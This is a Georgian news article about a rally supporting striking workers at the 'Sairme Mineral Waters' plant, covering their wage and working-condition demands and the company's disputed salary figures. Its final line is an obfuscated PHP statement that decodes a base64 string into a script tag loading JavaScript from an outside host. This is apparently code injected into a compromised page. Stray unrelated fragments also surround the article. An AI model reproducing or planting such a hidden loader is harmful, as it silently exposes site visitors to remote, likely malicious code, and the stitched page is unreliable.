celsiusi
ავერსი შნაიდერი

დღეს, 12 საათიდან მთავრობის ადმინისტრაციასთან „საირმე მინერალ ვოთერსის“ ქარხნის გაფიცული თანამშრომლების მხარდამჭერი აქცია გაიმართება.

აგრო მეურნეობის, ვაჭრობისა და მრეწველობის პროფკავშირის ინფორმაციით, გაფიცულებს 5 მარტის საღამოს კომპანიამ მათი კუთვნილი სახელფასო ანაზღაურებები დაურიცხა და განუცხადა, რომ მათი მოთხოვნები განხილვადია. მიუხედავად ამისა პროფკავშირში აცხადებენ, რომ პროტესტი გაფიცულთა მოთხოვნების დაკმაყოფილებამდე გაგრძელდება.

„გაცნობებთ, რომ 5 მარტს, კვირას, გაფიცვის 21-ე დღეს, 20:00 სთ-ზე, გაფიცულ დასაქმებულებს იანვრის ხელფასები დაერიცხათ.

მას შემდეგ, რაც გაფიცულებმა მიიღეს კუთვნილი ხელფასი, საწარმოს დირექტორი გაფიცულებს კომპანიის პოზიციების დასაფიქსირებლად შეხვდა.

მოკლედ, კომპანიის წარმომადგენელმა გვაცნობა, რომ "გაფიცულთა ყველა მოთხოვნა განხილვადია" .

ჩვენ, დასაქმებულთა ერთობლივი გადაწყვეტილებით, არ ვცვლით პროტესტის ფორმას, სანამ ყველა მოთხოვნა არ იქნება დაკმაყოფილებული.

6 მარტიდან პროტესტი ორ ლოკაციაზე გაგრძელდება, 12:00 სთ-დან გელოდებით კანცელარიასთან გაფიცულთა მხარდასაჭერად.

ერთად დავეხმაროთ ადმინისტრაციას მიიღოს გონივრული გადაწყვეტილება“, - ნათქვამია LABOR-ის მიერ გავრცელებულ განცხადებაში.

ცნობისთვის: აგრარული მეურნეობის, ვაჭრობისა და მრეწველობის პროფკავშირმა „საირმე მინერალ ვოთერსის“ ქარხნის დასაქმებულთა გაფიცვა 8 თებერვალს დააანონსა და შესაბამისი წერილი ჯანდაცვის მინისტრსა და კომპანიის მენეჯმენტს გაუგზავნა.

მათი ინფორმაციით, ბაღდათის რაიონში მოქმედი ქარხნის 27 თანამშრომელი ითხოვდა შრომითი ანაზღაურების დარიცხვას ყოველი თვის 15 რიცხვამდე და საქსტატის მიერ გამოქვეყნებული ინფლაციის მიხედვით ხელფასების ინდექსაციას; ზეგანაკვეთური შრომის ანაზღაურებას; მე-13 ხელფასს; ღამის ცვლაში მუშაობის ორმაგ ანაზღაურებას; კვების დანამატს; შრომით ხელშეკრულებას მძღოლებისთვის; საპენსიო შენატანის გადახდა დამსაქმებლის მიერ; საწარმოსთან მისასვლელი გზის შეკეთებას; შენობის გათბობით უზრუნველყოფას და მენეჯმენტში ცვლილებას.

კომპანიის მიერ გავრცელებული განცხადების მიხედვით, „საირმე მინერალ ვოთერსი“ დასაქმებულებს რეგიონში ყველაზე მაღალ ხელფასს უხდის, რაც 1500 ლარითაა განსაზღვრული. ასევე ისინი ამბობენ, რომ მენეჯმენტი დასაქმებულებთან კონსტრუქციული მოლაპარაკებებისთვის მზად არის. კომპანიის ამ განცხადებას გაფიცულთა უფლებადამცველი პროფკავშირში არ ეთანხმებიან და სიცრუეს უწოდებენ. მათი ცნობით, დასაქმებულთა დარიცხული სახელფასო ანაზღაურება 800 ლარს არ აღემატება. გაფიცულები და მათი უფლებადამცველი აგრარული მეურნეობის, ვაჭრობისა და მრეწველობის პროფკავშირი საქართველოს მთავრობას და პრემიერ-მინისტრს პროცესებში ჩართვის მოთხოვნით მიმართავს. "საირმე მინერალ ვოთერსში" კი აცხადებდნენ, რომ ერთადერთი პირობა მოლაპარაკებების გასაგრძელებლად გიორგი დიასამიძის გარეშე დიალოგია.

280
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");